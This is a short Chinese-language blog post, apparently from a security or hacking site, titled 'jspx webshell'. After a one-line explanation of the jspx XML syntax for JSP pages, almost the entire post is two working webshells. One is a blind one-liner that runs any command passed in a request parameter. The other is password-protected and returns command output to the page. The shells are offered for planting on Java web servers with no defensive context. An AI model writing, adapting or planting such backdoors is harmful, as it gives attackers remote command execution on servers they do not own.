jspx webshell

2018年5月28日 0 By hackeye

jspx是JSP2.0中一项重要的功能提升,jspx其实是以xml语法来书写jsp。
jspx一句话无回显命令执行:
<jsp:root xmlns:jsp=”http://java.sun.com/JSP/Page”  version=”1.2″>
<jsp:directive.page contentType=”text/html” pageEncoding=”UTF-8″ />
<jsp:scriptlet>
Runtime.getRuntime().exec(request.getParameter(“hackeye”));
</jsp:scriptlet>
</jsp:root>

带回显执行:
<jsp:root xmlns:jsp=”http://java.sun.com/JSP/Page”  version=”1.2″>
<jsp:directive.page contentType=”text/html” pageEncoding=”UTF-8″ />
<jsp:scriptlet>
if(“hackeye”.equals(request.getParameter(“pwd”))){
java.io.InputStream in = Runtime.getRuntime().exec(request.getParameter(“i”)).getInputStream();
int a = -1;
byte[] b = new byte[2048];
out.print(“&lt;pre&gt;”);
while((a=in.read(b))!=-1){
out.println(new String(b));
}
out.print(“&lt;/pre&gt;”);
}
</jsp:scriptlet>
</jsp:root>